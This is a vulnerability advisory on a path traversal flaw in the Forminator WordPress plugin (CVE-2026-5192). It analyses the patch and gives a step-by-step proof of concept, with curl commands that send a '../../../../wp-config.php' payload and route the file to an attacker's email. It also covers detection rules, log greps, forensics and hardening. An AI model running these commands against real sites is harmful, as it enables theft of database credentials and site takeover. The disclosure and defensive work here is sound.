SECURITY ADVISORY / 01

CVE-2026-5192 Exploit & Vulnerability Analysis

Complete CVE-2026-5192 security advisory with proof of concept (PoC), exploit details, and patch analysis.

cve_patchdiff:forminator NVD ↗
Exploit PoC Vulnerability Patch Analysis

CVE-2026-5192 Security Analysis: Path Traversal in Forminator Forms Plugin

1. Vulnerability Background

What is This Vulnerability?

CVE-2026-5192 represents a path traversal vulnerability in the Forminator Forms plugin for WordPress that enables unauthenticated attackers to read arbitrary files from the server filesystem. The vulnerability exists in the email attachment handling mechanism, which fails to validate that attachment file paths are confined to the WordPress upload directory.

The flaw allows attackers to manipulate the upload-1[file][file_path] parameter to reference files outside the intended upload directory, such as:

  • Configuration files (wp-config.php)
  • System files (/etc/passwd)
  • Database backups
  • Private keys and credentials
  • Source code and sensitive documentation

Why is This Critical?

CVSS v3.1 Severity Assessment:

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Impact: Confidentiality - High

This vulnerability is critical because:

  1. Unauthenticated Access: No user account or authentication is required; any visitor can exploit this.
  2. Zero Prerequisites (Minimal): Exploitation requires only a publicly accessible form with specific settings enabled, which are common configurations.
  3. Direct Information Disclosure: Attackers gain direct read access to sensitive files containing credentials, configuration data, and intellectual property.
  4. Common Plugin Usage: Forminator is a popular form builder with thousands of active installations across WordPress sites.
  5. Silent Exploitation: File access occurs through email notifications, potentially leaving minimal audit trails depending on logging configuration.

Affected Systems and Versions

  • Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder
  • Affected Versions: Up to and including version 1.52.1
  • Installation Base: WordPress plugin directory indicates widespread deployment
  • Prerequisites for Exploitation:
    • Public form with File Upload field
    • "Save and Continue" feature enabled in form Behavior settings
    • "Save and Continue" email notification configured
    • Email notification configured to attach uploaded files

2. Technical Details

Root Cause Analysis

The vulnerability stems from a lack of path validation in the email attachment handling mechanism. The vulnerable code processes user-supplied file paths directly without verifying they reside within the designated upload directory.

Code Flow Analysis:

User Submission (File Upload Field)
    ↓
File Path Parameter: upload-1[file][file_path]
    ↓
Form Processing / Save and Continue Handler
    ↓
Email Notification Handler (abstract-class-mail.php)
    ↓
apply_filters('forminator_custom_form_mail_attachment')
    ↓
[VULNERABLE] Direct use of $attachment array
    ↓
Email sent with arbitrary file attached

Why Validation Was Missing:

The original implementation in lines 354-378 of abstract-class-mail.php applied a filter to the attachments array but performed no path sanitization or validation before trusting the attachment paths. The developers assumed that:

  1. File paths would only contain legitimate upload directory files
  2. File upload handlers would prevent path traversal
  3. The email notification system didn't require additional security checks

This represents a trust boundary violation where user-controlled input (indirectly through file path manipulation) was used without proper validation.

Attack Vector and Exploitation Conditions

Exploitation Prerequisites:

  1. Form Configuration Requirements:

    • Publicly accessible form
    • File Upload field component
    • "Save and Continue" enabled in form Behavior settings
    • Email notification configured with "Save and Continue" trigger
    • Email notification configured to attach uploaded files
  2. Network Requirements:

    • Access to form submission endpoint
    • Ability to craft HTTP requests with file path parameters

Attack Vector Mechanism:

The vulnerability operates through the form's save-and-continue functionality. When a user (or attacker) submits a form with a file upload field, the system stores the file path. The attacker manipulates this path parameter to reference arbitrary files:

Normal Submission:
POST /wp-admin/admin-ajax.php?action=forminator_submit_form
file_path=/wp-content/uploads/2024/01/legitimate-file.pdf

Malicious Submission:
POST /wp-admin/admin-ajax.php?action=forminator_submit_form
file_path=../../../../wp-config.php

Exploitation Scenario:

  1. Attacker identifies a WordPress site using Forminator with a vulnerable configuration
  2. Attacker locates a public form with a File Upload field
  3. Attacker crafts a form submission with traversal sequences in the file path parameter
  4. System processes the submission and sends "Save and Continue" email
  5. Email notification includes the arbitrary file as an attachment
  6. Critical Point: If the attacker provides their own email address or controls the email recipient, they receive the attached sensitive file

Alternatively, if attackers can access email logs or intercept email traffic on misconfigured systems, they capture the attachment without email control.

Security Implications

Confidentiality Breach Impact:

| File Category | Examples | Impact | |---|---|---| | Configuration | wp-config.php, database credentials | Database access, admin credentials | | System Files | /etc/passwd, /etc/shadow | User enumeration, password cracking targets | | Application Secrets | API keys, OAuth tokens, payment credentials | Account takeover, financial fraud | | Source Code | Plugin/theme files, custom code | Logic vulnerabilities, hardcoded secrets | | Data Files | Database backups, exported data | PII exposure, compliance violations | | Logs | Error logs, access logs | Forensic information, system weaknesses |

Exploitation Chain for Full Compromise:

1. Extract wp-config.php → Obtain database credentials
2. Access database via credentials → Export user data and secrets
3. Extract theme/plugin files → Identify additional vulnerabilities
4. Use obtained credentials → Escalate to admin access
5. Deploy backdoor → Establish persistent access

3. Patch Analysis

Code Changes Made

Modified File: library/abstracts/abstract-class-mail.php

Change 1: Introduction of Validation Call

// BEFORE (Vulnerable)
$this->attachment = apply_filters( 
    'forminator_custom_form_mail_attachment', 
    $attachment, 
    $custom_form, 
    $entry, 
    $this->pdfs 
);

// AFTER (Patched)
$attachment             = $this->filter_attachments( $attachment );
$this->attachment       = apply_filters( 
    'forminator_custom_form_mail_attachment', 
    $attachment, 
    $custom_form, 
    $entry, 
    $this->pdfs 
);

Change 2: Implementation of filter_attachments() Method

/**
 * Filter attachments to make sure only files in upload dir can be attached.
 *
 * @param array $attachments Attachments to filter.
 * @return array
 */
private function filter_attachments( $attachments ) {
    if ( ! empty( $attachments ) ) {
        $upload_dir = wp_upload_dir();
        if ( ! empty( $upload_dir['basedir'] ) ) {
            foreach ( $attachments as $key => $attachment ) {
                // Ensure path begins with upload directory path
                if ( 0 !== strpos( $attachment, $upload_dir['basedir'] ) ) {
                    unset( $attachments[ $key ] );
                }
            }
        }
    }

    return $attachments;
}

How These Changes Fix the Vulnerability

Security Mechanism: Path Prefix Validation

The patch implements a whitelist-based approach to attachment validation:

  1. Upload Directory Extraction:

    $upload_dir = wp_upload_dir();
    // Returns: ['basedir' => '/var/www/html/wp-content/uploads', ...]
    
  2. Path Prefix Verification:

    strpos( $attachment, $upload_dir['basedir'] )
    // Returns 0 if path STARTS with upload directory
    // Returns false if path does NOT start with upload directory
    
  3. Rejection of Non-Conforming Paths:

    if ( 0 !== strpos( $attachment, $upload_dir['basedir'] ) ) {
        unset( $attachments[ $key ] );
        // File outside upload dir is silently removed
    }
    

Attack Prevention Demonstration:

| Attack Vector | Result | |---|---| | /wp-content/uploads/form-123/file.pdf | ✅ ALLOWED (matches prefix) | | ../../../../wp-config.php | ❌ BLOCKED (doesn't match prefix) | | /etc/passwd | ❌ BLOCKED (doesn't match prefix) | | /var/www/html/wp-config.php | ❌ BLOCKED (doesn't match prefix) |

Security Improvements Introduced

  1. Defense in Depth:

    • Validation occurs at the email handling layer, providing secondary defense
    • Prevents compromise of attachments even if earlier validation fails
    • Complements any frontend or upload handler protections
  2. Trust Boundary Establishment:

    • Explicitly defines that only files in WordPress upload directory are trusted
    • Rejects all paths outside this boundary
    • Prevents assumption of trust in user-supplied paths
  3. Fail-Safe Design:

    • Invalid attachments are silently removed (not redirected or reprocessed)
    • Email notification still sends without the malicious attachment
    • No error messages reveal directory structure information
  4. WordPress Standards Compliance:

    • Uses wp_upload_dir() - the canonical WordPress API
    • Respects custom upload directory configurations
    • Compatible with multisite and alternative directory structures
  5. Zero Performance Impact:

    • Simple string comparison operation
    • Single loop iteration
    • No additional database queries or file operations

4. Proof of Concept (PoC) Guide

Prerequisites for Exploitation

Required for Successful Exploitation:

  1. Target Website:

    • WordPress installation with Forminator ≤ 1.52.1
    • Plugin enabled and active
    • Forminator forms published and accessible
  2. Form Configuration (attacker discovery):

    • Form with File Upload field visible
    • "Save and Continue" enabled in Behavior settings
    • "Save and Continue" email notification active
    • File attachment enabled in email notification
  3. Attacker Capabilities:

    • Network access to WordPress site (can be public)
    • Ability to craft HTTP POST requests
    • Email access to receive or intercept notifications (or site admin controls email forwarding)
  4. Information Gathering:

    • Identify WordPress installation path
    • Determine plugin version (visible in source or through fingerprinting)
    • Map form structure (field names via form inspection)

Step-by-Step Exploitation Approach

Phase 1: Reconnaissance

## Identify Forminator version
curl -s https://target.com/wp-content/plugins/forminator/forminator.php | grep "Version:"

## Identify WordPress installation path (standard /wp-admin/, /wp-content/)
curl -s https://target.com/wp-content/plugins/forminator/ -I

## Locate public forms (typically indexed or in sitemap)
curl -s https://target.com/sitemap.xml | grep form

Phase 2: Form Analysis

## Capture form HTML to identify:
## 1. Form ID
## 2. File upload field name
## 3. Form action endpoint
## 4. AJAX handler used

curl -s https://target.com/contact-form | grep -E 'form|upload|forminator'

Phase 3: Craft Malicious Payload

## Create request with path traversal payload
## Standard WordPress structure: /wp-content/uploads/
## Target file: /wp-config.php (one level up from wp-content)

PAYLOAD='../../../../wp-config.php'

## Form parameter structure (may vary):
## upload-1[file][file_path] for Save and Continue feature

Phase 4: Execute Exploitation

## Submit form with traversal payload
## Method 1: Direct POST with crafted file_path parameter

curl -X POST https://target.com/wp-admin/admin-ajax.php \
  -d "action=forminator_submit_form" \
  -d "form_id=1" \
  -d "upload_file=dummy.txt" \
  -d "upload-1[file][file_path]=../../../../wp-config.php" \
  -d "[email protected]"

## Method 2: If form requires initial submission, modify Save and Continue session
## The system stores file_path in user entry; subsequent "Save and Continue"
## generates email with this path attached

Phase 5: Retrieve Exfiltrated Data

## Wait for Save and Continue email notification to be sent
## Check attacker-controlled email inbox
## Email will contain wp-config.php as attachment

## If email interception possible:
grep -i "database" wp-config.php.txt
grep -i "auth_key\|secure_auth_key" wp-config.php.txt

Expected Behavior vs Exploited Behavior

Legitimate Behavior (Normal Form Usage):

1. User uploads file: document.pdf
2. File saved to: /wp-content/uploads/forminator/form-1/doc_xyz.pdf
3. File path stored: /wp-content/uploads/forminator/form-1/doc_xyz.pdf
4. Email attachment: document.pdf (legitimate upload)
5. Outcome: Form submission processed, email sent with user's file

Exploited Behavior (Path Traversal Attack):

1. Attacker submits form with manipulated file_path parameter
2. File path parameter: ../../../../wp-config.php
3. File path stored: ../../../../wp-config.php (without validation)
4. System resolves to: /wp-config.php (actual file on system)
5. Email attachment: wp-config.php (sensitive configuration file)
6. Outcome: Attacker receives configuration with database credentials

How to Verify the Vulnerability Exists

Method 1: Manual Testing (Safe)

## Use intercepting proxy (Burp Suite, OWASP ZAP)
## 1. Intercept form submission
## 2. Locate file_path parameter
## 3. Replace value with: ../../../../wp-config.php
## 4. Forward request
## 5. Check if email notification includes unexpected attachment

## Non-intrusive: Check source code if accessible
curl -s https://target.com/wp-content/plugins/forminator/library/abstracts/abstract-class-mail.php | grep filter_attachments
## If filter_attachments method exists: PATCHED
## If method absent: VULNERABLE

Method 2: Version Detection

## Direct version check
curl -s https://target.com/wp-content/plugins/forminator/forminator.php | \
  grep "Version:" | head -1

## Compare against known vulnerable versions: ≤ 1.52.1
## If version ≤ 1.52.1 and filter_attachments doesn't exist: VULNERABLE

Method 3: Automated Vulnerability Scanning

## Use security plugins (e.g., Wordfence, Sucuri)
## These detect known vulnerable versions during routine scans

## WPScan vulnerability database check
wpscan --url https://target.com --api-token YOUR_TOKEN
## Reports CVE-2026-5192 if vulnerable version detected

Method 4: Behavioral Testing (Requires Caution)

## Only on authorized test environments
## 1. Set up WordPress with vulnerable Forminator
## 2. Enable form logging/debugging
## 3. Submit form with benign traversal test: ../../../../etc/hostname
## 4. Check if file content appears in email attachment
## 5. If present: CONFIRMED VULNERABLE

5. Recommendations

Mitigation Strategies

Immediate Actions (Pre-Patch)

For Site Administrators:

  1. Disable Vulnerable Feature (Highest Priority)

    WordPress Dashboard:
    - Forminator → Settings → Forms
    - Locate all forms with File Upload fields
    - For each form:
      * Go to Behavior settings
      * Disable "Save and Continue" feature
    OR
      * Disable file attachment in email notifications
    

    Effectiveness: 100% - Eliminates attack vector entirely Trade-off: Lose Save and Continue functionality for that form

  2. Remove File Upload Fields

    - Edit vulnerable forms
    - Delete File Upload field components
    - Rebuild with alternative data collection methods
    

    Effectiveness: 100% - Removes exploit path Trade-off: Loss of file upload capability

  3. Restrict Form Access

    - Implement page-level access controls
    - Require authentication before form display
    - Use geolocation/IP restriction plugins
    

    Effectiveness: High - Reduces attacker pool Trade-off: May restrict legitimate users

  4. Implement Web Application Firewall (WAF)

    Rules to block:
    - Requests with ".." sequences in form parameters
    - Requests with "/etc/", "wp-config", "password" in parameters
    - Requests exceeding normal file path lengths
    

    Effectiveness: Medium-High - May produce false positives Tools: Cloudflare, AWS WAF, Sucuri, Wordfence

    # Example nginx rule
    if ($args ~* "(\.\.\/|\/etc\/|wp-config)") {
        return 403;
    }
    
Medium-Term Actions (During Patching)
  1. Monitor File Access Logs

    # Watch for attempts to access wp-config.php and sensitive files
    tail -f /var/log/apache2/access.log | grep -E "(wp-config|etc/passwd|\.\.)"
    
    # Check WordPress error logs
    tail -f /var/www/html/wp-content/debug.log
    
  2. Audit Email Logs

    - Check server mail logs for Save and Continue notifications
    - Identify unusual attachment names (config files, system files)
    - Review recipient addresses for suspicious destinations
    
  3. Implement Content Security Policy (CSP)

    <!-- Limits what forms can do, though doesn't directly prevent traversal -->
    Content-Security-Policy: form-action 'self'
    
Long-Term Actions (Post-Patch)
  1. Apply Plugin Update

    WordPress Dashboard:
    - Plugins → Forminator
    - Update to version 1.52.2 or later
    - Verify update successfully applied
    
  2. Add Security Monitoring

    - Install security plugin (Wordfence, iThemes Security)
    - Enable file integrity monitoring
    - Alert on suspicious file access patterns
    
  3. Implement Principle of Least Privilege

    - Restrict file permissions on sensitive files
    - Ensure wp-config.php has 600 permissions
    - Use separate user for web server
    

Detection Methods

Log-Based Detection

Apache/Nginx Access Logs:

## Pattern 1: Traversal sequences in form parameters
grep -E "upload.*\.\." /var/log/apache2/access.log

## Pattern 2: Access to wp-config in parameters
grep "wp-config" /var/log/apache2/access.log

## Pattern 3: Forminator AJAX with suspicious paths
grep "forminator_submit_form.*\.\." /var/log/apache2/access.log

## Pattern 4: Multiple slashes (URL encoded)
grep "%2e%2e" /var/log/apache2/access.log  # URL-encoded ..

WordPress Error Logs:

// WordPress typically logs file operations
// Check wp-content/debug.log for:
// - Failed file attachment operations
// - Removed attachments
// - Permission denied errors

tail -f /var/www/html/wp-content/debug.log | grep -E "(forminator|attachment|traversal)"
Behavioral Detection (SIEM/IDS)

Network-Based:

Alert Conditions:
1. POST to /wp-admin/admin-ajax.php?action=forminator_submit_form
2. Parameter contains ".." or "../" sequences
3. Parameter references system paths (/etc/, /var/, /root/)
4. Parameter length > 500 bytes
5. Multiple requests from same IP in short timeframe

Host-Based:

Alert Conditions:
1. Web server process attempting to read /wp-config.php
2. Mail process attaching files outside /wp-content/uploads
3. Multiple file access attempts with unusual paths
4. Email sent with suspicious attachment names

Example Detection Rule (Suricata):

alert http any any -> any any (
    msg:"CVE-2026-5192 Forminator Path Traversal Attempt";
    content:"POST";
    http_method;
    content:"/wp-admin/admin-ajax.php";
    http_uri;
    content:"action=forminator_submit_form";
    http_client_body;
    pcre:"/file_path[^=]*=([^&]*\.\.[^&]*|[^&]*\/etc\/[^&]*)/";
    http_client_body;
    classtype:attempted-admin;
    sid:9999001;
    rev:1;
)
Forensic Analysis

Post-Incident Investigation:

## 1. Check mail server logs for suspicious attachments
grep -r "wp-config\|/etc/\|shadow" /var/log/mail.log*

## 2. Review email queue for sent items
mailq | grep -E "wp-config|forminator"

## 3. Check if any files were actually exfiltrated
stat /wp-config.php  # File access times
ls -la --full-time /wp-config.php

## 4. Review Forminator entries/submissions
## Check database for suspicious file paths
mysql wordpress -e "SELECT * FROM wp_forminator_submissions WHERE data LIKE '%..%';"

## 5. Look for evidence of privilege escalation post-exploitation
## Check for new admin users, modified .htaccess, backdoors

Best Practices to Prevent Similar Issues

Development Best Practices
  1. Input Validation (Whitelist Approach)

    // Bad: Trust that paths are correct
    $attachment = $_POST['file_path'];
    
    // Good: Validate against whitelist
    function validate_attachment_path($path) {
        $upload_dir = wp_upload_dir();
        if (0 !== strpos(realpath($path), $upload_dir['basedir'])) {
            return false;
        }
        return true;
    }
    
  2. Path Normalization

    // Always use realpath() to resolve traversal sequences
    $real_path = realpath($user_supplied_path);
    $upload_dir = realpath($upload_dir['basedir']);
    
    if (strpos($real_path, $upload_dir) !== 0) {
        // Not in upload directory
        throw new Exception('Invalid path');
    }
    
  3. Separate Trusted from Untrusted Data

    // Use different variables to distinguish sources
    $user_provided_filename = $_POST['filename']; // Untrusted
    $system_path = wp_upload_dir()['path']; // Trusted
    $safe_path = $system_path . '/' . basename($user_provided_filename);
    
  4. Use Framework APIs

    // Instead of manual path construction
    $safe_path = wp_normalize_path(
        sanitize_file_name($_POST['filename'])
    );
    
    // Use WordPress constants
    $upload_dir = wp_upload_dir();
    
  5. Security-First Code Review Checklist

    ☐ All user input is validated (whitelist, not blacklist)
    ☐ File paths are normalized (realpath())
    ☐ Boundary checks exist (confirmed in designated directory)
    ☐ Error messages don't reveal paths
    ☐ Logging captures security events
    ☐ Tests include traversal attempts
    ☐ Documentation explains security assumptions
    
Architecture Best Practices
  1. Principle of Least Privilege

    • Web server runs as unprivileged user
    • Only has write access to upload directories
    • Cannot read wp-config.php or system files
    • Database user has minimal permissions
  2. Defense in Depth

    • Multiple validation layers (frontend, backend, mail handler)
    • Each layer makes independent security decision
    • Single validation failure doesn't enable attack
  3. Security Boundaries

    TRUSTED ZONE (Backend)
    ├─ System files (wp-config.php)
    ├─ Database
    └─ Application code
    
    SEMI-TRUSTED ZONE (Upload Directory)
    ├─ User files
    └─ Generated temporary files
    
    UNTRUSTED ZONE (User Input)
    ├─ Form submissions
    ├─ URL parameters
    └─ User-controlled headers
    
    Rules: Data from untrusted must not access trusted directly
    
  4. Deny by Default Pattern

    // Instead of: "Allow what we know is safe"
    if (is__safe($path)) { allow }
    
    // Use: "Allow only specific approved paths"
    $allowed_paths = [wp_upload_dir()['basedir']];
    if (in_array($path, $allowed_paths)) { allow }
    else { deny }
    
  5. Security Testing

    All code changes must include:
    ☐ Unit tests for validation logic
    ☐ Fuzz tests with malicious input
    ☐ Path traversal test cases
    ☐ Boundary condition tests
    ☐ Real-world attack scenario tests
    
Operational Best Practices
  1. Regular Security Updates

    • Subscribe to plugin security advisories
    • Apply patches within 24-48 hours of release
    • Test in staging environment first
    • Automate update checking where possible
  2. Security Configuration Hardening

    wp-config.php:
    ☐ Define('WP_DISABLE_FATAL_ERROR_HANDLER', false);
    ☐ Enable wp_debug = true in staging
    ☐ Disable file editing: DISALLOW_FILE_EDIT = true
    
    .htaccess:
    ☐ Deny direct access to sensitive files
    <files "wp-config.php">
        order allow,deny
        deny from all
    </files>
    
    Permissions:
    ☐ wp-config.php: 600 (read only by owner)
    ☐ wp-content: 755 (for web server write to uploads)
    ☐ wp-content/uploads: 755 (world readable for file serving)
    
  3. Security Monitoring Program

    • Regular vulnerability scans (weekly minimum)
    • File integrity monitoring (critical files)
    • Access log analysis (monthly review)
    • Security advisory subscriptions (plugin vendors, WordPress)
  4. Incident Response Preparation

    Plan must include:
    ☐ Procedure for disabling vulnerable plugins
    ☐ Rollback plan for failed patches
    ☐ Communication protocol for affected users
    ☐ Forensic preservation procedures
    ☐ Backup restore procedures
    

Conclusion

CVE-2026-5192 demonstrates a critical vulnerability class (path traversal) that persists despite apparent simplicity. The flaw highlights the importance of:

  1. Validating all file paths - Never assume user input is safe, even indirectly
  2. Defense in depth - Multiple validation layers prevent single points of failure
  3. Explicit security boundaries - Define what data is trusted and what isn't
  4. Regular patching - Vulnerabilities are discovered regularly; update promptly
  5. Security testing - Include adversarial test cases in development

The patch implements sound security principles through path prefix validation, serving as a template for similar vulnerabilities across WordPress and web applications generally.

Frequently asked questions about CVE-2026-5192

What is CVE-2026-5192?

CVE-2026-5192 is a security vulnerability. This security advisory provides detailed technical analysis of the vulnerability, exploit methodology, affected versions, and complete remediation guidance.

Is there a PoC (proof of concept) for CVE-2026-5192?

Yes. This writeup includes proof-of-concept details and a technical exploit breakdown for CVE-2026-5192. Review the analysis sections above for the PoC walkthrough and code examples.

How does CVE-2026-5192 get exploited?

The technical analysis section explains the vulnerability mechanics, attack vectors, and exploitation methodology. PatchLeaks publishes this information for defensive and educational purposes.

What products and versions are affected by CVE-2026-5192?

CVE-2026-5192 — check the affected-versions section of this advisory for specific version ranges, vulnerable configurations, and compatibility information.

How do I fix or patch CVE-2026-5192?

The patch analysis section provides guidance on updating to patched versions, applying workarounds, and implementing compensating controls.

What is the CVSS score for CVE-2026-5192?

The severity rating and CVSS scoring for CVE-2026-5192 is documented in the vulnerability details section. Refer to the NVD entry for the current authoritative score.